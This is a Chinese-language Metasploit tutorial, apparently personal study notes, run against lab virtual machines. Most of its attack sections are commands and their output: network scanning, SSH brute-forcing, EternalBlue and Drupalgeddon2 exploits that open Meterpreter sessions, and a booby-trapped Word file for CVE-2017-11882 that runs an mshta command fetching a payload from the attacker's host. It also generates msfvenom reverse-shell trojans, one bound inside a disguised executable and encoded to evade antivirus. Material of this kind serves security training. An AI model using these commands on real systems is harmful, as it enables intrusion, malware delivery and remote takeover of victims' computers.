Metasploit使用：

安装：

在一般的linux中，默认是不安装MSF的。以下是在非kali的Linux下安装MSF框架。

一键安装：

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

adduser msf #添加msf用户
su msf #切换到msf用户
cd /opt/metasploit-framework/bin #切换到msf所在的目录
./msfconsole #以后启动msfconsole，都切换到msf用户下启动，这样会同步数据库。如果使用root用户启动的话，不会同步数据库

也可以将msfconsole加入到执行目录下，这样在任何目录直接msfconsole就可以了
ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole

#备注：
#初次运行msf会创建数据库，但是msf默认使用的PostgreSQl数据库不能与root用户关联，这也就是需要新建用户msf来运行metasploit的原因所在。如果你不小心手一抖，初次运行是在root用户下，请使用msfdb reinit命令，然后使用非root用户初始化数据库。

1，技术架构如下：

auxiliary：辅助模块

Metasploit 为渗透测试的信息搜集环节提供了大量的辅助模块支持，包括针对各种网络服务的扫描与查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz 测试发掘漏洞、实施网络协议欺骗等模块。
辅助模块能够帮助渗透测试者在渗透攻击之前取得目标系统丰富的情报信息。

encoders：编码器模块

攻击载菏模块与空指令模块组装完成一个指令序列后，在这段指令被渗透攻击模块加入邪恶数据缓冲区交由目标系统运行之前，Metasploit框架还需要完成一道非常重要的工序-编码。

确保攻击载荷中不会出现渗透攻击过程中应加以避免的”坏字符”
对攻击载荷进行“免杀”处理。

evasion：免杀模块

对攻击载荷进行“免杀”处理。

exploits：渗透攻击模块

渗透攻击模块是利用发现的安全漏洞或配置弱点对目标系统进行攻击，以植入和运行攻击载荷，从而获取对远程目标系统访问权的代码组件。

主动渗透攻击所利用的安全漏洞位于网络服务端软件与服务承载的上层应用程序之中，由于这些服务通常是在主机上开启一些监听端口并等待客户端连接，因此针对它们的渗透攻击可以主动发起，通过连接目标系统网络服务，注入一些特殊构造的包含”邪恶”攻击数据的网络请求内容，触发安全漏洞，并使得远程服务进程执行在”邪恶”数据中包含攻击载荷，从而获取目标系统的控制会话

被动渗透攻击利用的漏洞位于客户端软件中，如浏览器、浏览器插件、电子邮件客户端、0ffice 与Adobe等各种文档阅读与编辑软件。对于这类存在于客户端软件的安全漏洞，无法主动地将数据从远程输入到客户端软件中，因此只能采用被动渗透攻击的方式，即构造出”邪恶”的网页、电子邮件或文档文件，并通过架设包含此类恶意内容的服务、发送邮件附件、结合社会工程学分发并诱骗目标用户打开、结合网络欺骗和劫持技术等方式，等目标系统上的用户访问到这些邪恶的内容，从而触发客户端软件中的安全漏洞，给出控制目标系统的Shell会话。

nops：空指令模块

空指令是一些对程序运行状态不会造成任何实质影响的空操作或者无关操作指令，最典型的空指令就是空操作，在x86 CPU体系架构平台上的操作码是0x90。

“占位”。

payloads：攻击载荷模块

攻击载荷是在渗透攻击成功后使目标系统运行的一段植入代码，通常作用是作为渗透攻击者打开在目标系统上的控制会话连接。

MSF中特指会话链接方式，例如TCP反弹链接等。

post：后渗透模块

后渗透攻击模块主要是支持在渗透攻击取得目标系统访问权或者控制权之后，在受控系统中进行各式各样的后渗透攻击动作，比如获取敏感信息，进一步扩展，实施跳板攻击等。

2，命令速查

命令	解释
msfconsole	命令行模式启动MSF
exit	退出msf控制台终端退出会话
use	选择某一个模块
info	查看模块详细信息
set	对模块选项进行配置
show options	查看脚本配置选项
run exploit	启动脚本
search	搜索关键字 type:auxiliary path:telnet cve:2018-7600
show targets	显示适用的主机类型
show payloads	显示适用的payload类型
background	讲会话隐藏在后台
sessions -i	会话管理

搜索命令用法示例：

search ms17-010

search bluekeep

search CVE:2018-7600

search type:auxiliary path:telnet

简单使用：

进入框架msfconsole
使用use进入指定模块：use exploit/windows/smb/ms17_010_eternalblue
使用info查看模块信息：info
设置攻击载荷：set payload windows/x64/meterpreter/reveerse_tcp
查看模块需要配置的参数：set rhost 10.1.1.4
攻击：exploit / run或者直接run
后渗透阶段

不同攻击用到的步骤也不一样，这不是一成不变的，需要灵活运用。

我们也可以将攻击代码写入configure.rc（只要是以.rc结尾的文件）配置文件中，然后使用命令msfconsole -r configure.rc将进行自动攻击

3，情报收集

主机发现与端口扫描：

Metasploit提供了一些辅助模块可用于主机发现：

auxiliary/scanner/discovery/*

查看目录：

发现如上几个功能。

可以使用arp_sweep来枚举本地局域网中的所有活跃主机。

我们进入该模块使用以下命令：

use auxiliary/scanner/discovery/arp_sweep

然后show options查看需要设置的参数：

msf6 auxiliary(scanner/discovery/arp_sweep) > set Rhosts 192.168.189.0/24
Rhosts => 192.168.189.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 50
threads => 50
msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.189.1 appears to be up (VMware, Inc.).
[+] 192.168.189.2 appears to be up (VMware, Inc.).
[+] 192.168.189.254 appears to be up (VMware, Inc.).
[+] 192.168.189.138 appears to be up (VMware, Inc.).
[+] 192.168.189.139 appears to be up (VMware, Inc.).
[+] 192.168.189.142 appears to be up (VMware, Inc.).
[+] 192.168.189.254 appears to be up (VMware, Inc.).
[+] 192.168.189.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

可以设置扫描网段，以及扫描线程等等！

不过还是得使用nmap来进行扫描要好用一些，当扫描数量一旦上去，你就会知道为什么nmap被称作扫描之王了。

以下功能可进行端口扫描：

auxiliary/scanner/postscan/*

查看目录下内容：

└─# tree /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan 
/usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
├── ack.rb
├── ftpbounce.rb
├── syn.rb
├── tcp.rb
└── xmas.rb

有上述几个功能，建议使用syn扫描端口不易被发现。

但是扫描速度很慢的，还是要用扫描器之王nmap相当快。

探查服务的详细版本：

在metasploit中可以调用系统中的命令，比如可以使用nmap探测目标的详细服务信息。

msf6 auxiliary(scanner/portscan/syn) > nmap -A -p- -sS -sC -T4 -Pn 192.168.189.139
[*] exec: nmap -A -p- -sS -sC -T4 -Pn 192.168.189.139

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 20:07 CST
Nmap scan report for 192.168.189.139
Host is up (0.00100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36985/tcp   status
|   100024  1          42276/udp6  status
|   100024  1          50121/tcp6  status
|_  100024  1          58573/udp   status
36985/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:84:E2:7E (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.00 ms 192.168.189.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.04 seconds

服务查点：

在metasploit的辅助模块中，有很多用于服务扫描和查点的工具，这些工具通常以类似的方式ssh_version命名。该模块可用于遍历网络中包含某种服务的主机。并进一步确定服务的版本。

ssh服务查点：

通常管理员会使用SSH 对服务器进行远程管理，服务器会向SSH 客户端返回一个远程Shell 连接。如果没有做其他的安全增强配置，只要获取服务的登录口令，就可以使用SSH 客户端登录服务器，那就相当于获取了响应登录用户的所有权限。可以使用ssh_version 模块遍历网络中开启SSH 服务的主机。

msf6 > search ssh_version

Matching Modules
================

   #  Name                                       Disclosure Date  Rank    Check  Description
   -  ----                                       ---------------  ----    -----  -----------
   0  auxiliary/fuzzers/ssh/ssh_version_15                        normal  No     SSH 1.5 Version Fuzzer
   1  auxiliary/fuzzers/ssh/ssh_version_2                         normal  No     SSH 2.0 Version Fuzzer
   2  auxiliary/fuzzers/ssh/ssh_version_corrupt                   normal  No     SSH Version Corruption
   3  auxiliary/scanner/ssh/ssh_version                           normal  No     SSH Version Scanner


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/ssh/ssh_version

在ssh_login这个功能还可以达到爆破用户的效果：（不过扫描速度确实也是比较堪忧）

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.189.139:22 - Starting bruteforce
[-] 192.168.189.139:22 - Failed: 'flag4:flag4'
[!] No active DB -- Credential data will not be saved!
[-] 192.168.189.139:22 - Failed: 'flag4:'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: This list has been compiled by Solar Designer of Openwall Project'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: in 1996 through 2011.  It is assumed to be in the public domain.'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment:'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: This list is based on passwords most commonly seen on a set of Unix'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: systems in mid-1990's, sorted for decreasing number of occurrences'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: (that is, more common passwords are listed first).  It has been'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: revised to also include common website passwords from public lists'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: of "top N passwords" from major community website compromises that'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: occurred in 2006 through 2010.'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment:'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: Last update: 2011/11/20 (3546 entries)'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment:'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: For more wordlists, see https://www.openwall.com/wordlists/'
[-] 192.168.189.139:22 - Failed: 'flag4:123456'
[-] 192.168.189.139:22 - Failed: 'flag4:12345'
[-] 192.168.189.139:22 - Failed: 'flag4:password'
[-] 192.168.189.139:22 - Failed: 'flag4:password1'
[-] 192.168.189.139:22 - Failed: 'flag4:123456789'
[-] 192.168.189.139:22 - Failed: 'flag4:12345
.................
..................
...................
..................
补一句还是，hydra好用！！！

还可以利用模块中：dir_scanner来进行网站目录扫描：(还是那句话扫描速度堪忧真专业事还是专业工具来干吧)

msf6 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.189.139
[+] Found http://192.168.189.139:80/.../ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/.CVS/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/0/ 200 (192.168.189.139)
[+] Found http://192.168.189.139:80/Admin/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/USER/ 200 (192.168.189.139)
[+] Found http://192.168.189.139:80/abc/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/admin/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/batch/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/cgi-bin/ 403 (192.168.189.139)

........
...........
..........
......

4，主动渗透攻击

例1：经典永恒之蓝攻击（445端口）

msf6 > search ms17_010

   0   **exploit/windows/smb/ms17_010_eternalblue**       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  **exploit/windows/smb/ms17_010_psexec**            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  **auxiliary/admin/smb/ms17_010_command**           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  **auxiliary/scanner/smb/smb_ms17_010**             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .


Interact with a module by name or index. For example info 26, use 26 or use auxiliary/scanner/smb/smb_ms17_010

其中auxiliary/scanner/smb/smb_ms17_010这个用于扫描内网中存在永恒之蓝漏洞的功能块。

我在本地搭建了一个只有win7和kali的局域网虚拟机环境对其进行扫描：

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.1.1.0/24
rhosts => 10.1.1.0/24
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.1.1.0:445          - Rex::HostUnreachable: The host (10.1.1.0:445) was unreachable.
[-] 10.1.1.1:445          - Rex::HostUnreachable: The host (10.1.1.1:445) was unreachable.
[-] 10.1.1.2:445          - Rex::HostUnreachable: The host (10.1.1.2:445) was unreachable.
[-] 10.1.1.3:445          - Rex::HostUnreachable: The host (10.1.1.3:445) was unreachable.
[+] 10.1.1.4:445          - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[-] 10.1.1.5:445          - Rex::HostUnreachable: The host (10.1.1.5:445) was unreachable.
[-] 10.1.1.6:445          - Rex::HostUnreachable: The host (10.1.1.6:445) was unreachable.
[-] 10.1.1.7:445          - Rex::HostUnreachable: The host (10.1.1.7:445) was unreachable.
[-] 10.1.1.8:445          - Rex::HostUnreachable: The host (10.1.1.8:445) was unreachable.
[-] 10.1.1.9:445          - Rex::HostUnreachable: The host (10.1.1.9:445) was unreachable.

如上+代表成功扫描到了，可能存在永恒之蓝漏洞。

然后直接利用exploit模块下的永恒之蓝攻击工具，对该ip进行攻击

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.1.1.4
rhosts => 10.1.1.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.1.1.99
lhost => 10.1.1.99
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.1.1.99:4444 
[*] 10.1.1.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.1.1.4:445          - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.1.1.4:445          - Scanned 1 of 1 hosts (100% complete)
[+] 10.1.1.4:445 - The target is vulnerable.
[*] 10.1.1.4:445 - Connecting to target for exploitation.
[+] 10.1.1.4:445 - Connection established for exploitation.
[+] 10.1.1.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.1.1.4:445 - CORE raw buffer dump (42 bytes)
[*] 10.1.1.4:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.1.1.4:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.1.1.4:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.1.1.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.1.1.4:445 - Trying exploit with 12 Groom Allocations.
[*] 10.1.1.4:445 - Sending all but last fragment of exploit packet
[*] 10.1.1.4:445 - Starting non-paged pool grooming
[+] 10.1.1.4:445 - Sending SMBv2 buffers
[+] 10.1.1.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.1.1.4:445 - Sending final SMBv2 buffers.
[*] 10.1.1.4:445 - Sending last fragment of exploit packet!
[*] 10.1.1.4:445 - Receiving response from exploit packet
[+] 10.1.1.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.1.1.4:445 - Sending egg to corrupted connection.
[*] 10.1.1.4:445 - Triggering free of corrupted buffer.
[-] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.1.1.4:445 - Connecting to target for exploitation.
[+] 10.1.1.4:445 - Connection established for exploitation.
[+] 10.1.1.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.1.1.4:445 - CORE raw buffer dump (42 bytes)
[*] 10.1.1.4:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.1.1.4:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.1.1.4:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.1.1.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.1.1.4:445 - Trying exploit with 17 Groom Allocations.
[*] 10.1.1.4:445 - Sending all but last fragment of exploit packet
[*] 10.1.1.4:445 - Starting non-paged pool grooming
[+] 10.1.1.4:445 - Sending SMBv2 buffers
[+] 10.1.1.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.1.1.4:445 - Sending final SMBv2 buffers.
[*] 10.1.1.4:445 - Sending last fragment of exploit packet!
[*] 10.1.1.4:445 - Receiving response from exploit packet
[+] 10.1.1.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.1.1.4:445 - Sending egg to corrupted connection.
[*] 10.1.1.4:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 10.1.1.4
[*] Meterpreter session 1 opened (10.1.1.99:4444 -> 10.1.1.4:49359) at 2024-07-29 21:02:05 +0800
[+] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

出现meterpreter就说明已经攻击成功了！！从上面的日志可以看出并不是一次就会攻击成功的，他进行了两次攻击尝试，这个和工具里面的工具描述可以说得上是匹配上了！

然后输入shell获得一个类似windows平台下的cmd窗口。**(输入chcp 65001)临时解决乱码问题**

例2：CVE-2018-7600(DC-1,web)

首先，search CVE:2018-7600，查询是否有相关的cve攻击脚本：

查询结果如下：
msf6 > search CVE:2018-7600

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_drupalgeddon2  2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/drupal_drupalgeddon2

查询到以后直接use 0进入该功能块:然后使用info查看该模块的一些具体信息：

在此不演示直接使用show options来显示需要用到的参数配置：

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...
                                           ]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/us
                                           ing-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.189.141  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)



View the full module info with the info, or info -d command.

发现需要配置攻击ip：set rhosts 192.168.189.139

配置完成后直接进行攻击run

评价：

个人认为是非常之优雅！！

5，被动渗透攻击

office_cve_2017_11882：

适用office版本范围：2007-2016

利用python脚本：

python2 Command_CVE-2017-11882.py -c "calc" -o test.doc会生成一个word文档，一旦这个文档在待攻击靶机上被点击，就会自动执行命令calc，然后弹出计算器。我们可以在这里写一个反弹shell的命令来对其进行远程上线。

如何利用msf来对其进行利用呢，首先将github上clone下来的文件内容中有一个rb脚本，将其移入到exploit/icon_tools/这个模块下，然后show options对需要的参数进行一个解读如下：

msf6 > use exploit/icon_tools/office_cve_2017_11882 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(icon_tools/office_cve_2017_11882) > show options

Module options (exploit/icon_tools/office_cve_2017_11882):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be
                                       an address on the local machine or 0.0.0.0 to listen on all add
                                       resses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated
                                       )
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.189.141  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

其中SRVHOST设置服务端地址，SRVPORT是服务端口号，URIPATH是路径，我们可以对其进行一些设置

msf6 exploit(icon_tools/office_cve_2017_11882) > set srvport 80
srvport => 80
msf6 exploit(icon_tools/office_cve_2017_11882) > set uripath /a
uripath => /a
msf6 exploit(icon_tools/office_cve_2017_11882) > show options

Module options (exploit/icon_tools/office_cve_2017_11882):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be
                                       an address on the local machine or 0.0.0.0 to listen on all add
                                       resses.
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated
                                       )
   URIPATH  /a               no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.189.141  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(icon_tools/office_cve_2017_11882) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.189.141:4444 
msf6 exploit(icon_tools/office_cve_2017_11882) > [*] Using URL: http://192.168.189.141/a
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.189.141/a"


我们开启了一个服务，这个服务上有一个hta文件，利用mshta解释器执行这个文件。

这个是windows上的命令执行：mshta.exe “http://192.168.189.141/a"，相当于让其远程下载一个文件并执行：

接下来我们利用python脚本对其进行恶意word文档生成：

python2 Command_CVE-2017-11882.py -c "mshta.exe "http://192.168.189.141/a"" -o 如何给女朋友过好八十大寿.doc

┌──(root㉿zss)-[/home/zss/CVEtools/CVE-2017-11882/CVE-2017-11882]
└─# python2 Command_CVE-2017-11882.py -c "mshta.exe "http://192.168.189.141/a"" -o 如何给女朋友过好八十大寿.doc
[*] Done ! output file >> 如何给女朋友过好八十大寿.doc <<

成功生成了该doc攻击文件，上传到其服务器上，当对方点击该文件时，将会，执行命令mshta.exe "http://192.168.189.141/a，下载并执行a.hta文件，然后我方就成功上线了

对方一旦点击我们的恶意文件就会自动在kali上线：

msf6 exploit(icon_tools/office_cve_2017_11882) > 
[*] 192.168.189.250  office_cve_2017_11882 - Delivering payload
[*] Sending stage (176198 bytes) to 192.168.189.250
[*] Meterpreter session 2 opened (192.168.189.141:4444 -> 192.168.189.250:49479) at 2024-07-30 10:51:41 +0800
dir
[*] exec: dir

office_cve_2017_11882.rb
msf6 exploit(icon_tools/office_cve_2017_11882) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  2         meterpreter x86/windows  admin-PC\admin @ ADMIN-PC  192.168.189.141:4444 -> 192.168.189.25
                                                                0:49479 (192.168.189.250)

msf6 exploit(icon_tools/office_cve_2017_11882) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

总结流程：利用github上的rb脚本放到msf的exploit攻击模块上，然后利用其生成一个上线脚本，然后利用python脚本生成利用office远程命令执行漏洞的doc文档，当对方自主点击word文档时自动执行上线命令。

6，msfvenom

可以利用msfvenom生成ShellCode，形式多样，从多种编程语言到多平台，再到多种文件格式。简单来说就是生成”木马后门”。和msf配套的工具

常用参数：

msfvenom -h:一定要学会看文档：

举例：

<1>生成木马后门常用命令：

/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

我生成如下木马：这是一个简单的反弹命令木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.189.141 lport=4444 -f exe -o payload.exe

上传至win7主机，使其点击后反弹shell到我的我的主机：

补充：

生成木马后门命令：
Example:
/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.189.141 lport=4444 -f exe -o payload.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.189.141 lport=4444 -x wecheat.exe -k -f exe -o wecheat.exe
解释：
-x ：把木马捆绑到另外一个exe文件上去
-k：保持原来这个exe文件的功能
-f：格式是exe
-o：输出这样一个exe文件


msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.189.141 lport=4444 -i 12 -e x86/shikata_ga_nai -f exe -o payload.exe

解释：
-i：进行12编码
-e：编码器
尝试进行木马免杀

<2>msf开启监听：

msf6 > search exploit/multi/handler

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/linux/local/apt_package_manager_persistence  1999-03-09       excellent  No     APT Package Manager Persistence
   1  auxiliary/scanner/http/apache_mod_cgi_bash_env       2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   2  exploit/linux/local/bash_profile_persistence         1989-06-08       normal     No     Bash Profile Persistence
   3  exploit/linux/local/desktop_privilege_escalation     2014-08-07       excellent  Yes    Desktop Linux Password Stealer and Privilege Escalation
   4  exploit/multi/handler                                                 manual     No     Generic Payload Handler
   5  exploit/windows/mssql/mssql_linkcrawler              2000-01-01       great      No     Microsoft SQL Server Database Link Crawling Command Execution
   6  exploit/windows/browser/persits_xupload_traversal    2009-09-29       excellent  No     Persits XUpload ActiveX MakeHttpRequest Directory Traversal
   7  exploit/linux/local/yum_package_manager_persistence  2003-12-17       excellent  No     Yum Package Manager Persistence


Interact with a module by name or index. For example info 7, use 7 or use exploit/linux/local/yum_package_manager_persistence

msf6 > use 4
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >

进入handler：show options一手：

注意：我当时生成木马时，已经选择了payload：windows/meterpreter/reverse_tcp所以在此需要将payload重新建立：并设置好主机ip等：

如下：

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.189.141
设置完毕，接下来就等待对放触发上线

7，meterpreter

木马远控
C2（Control and Command）

技术优势：

平台通用性：

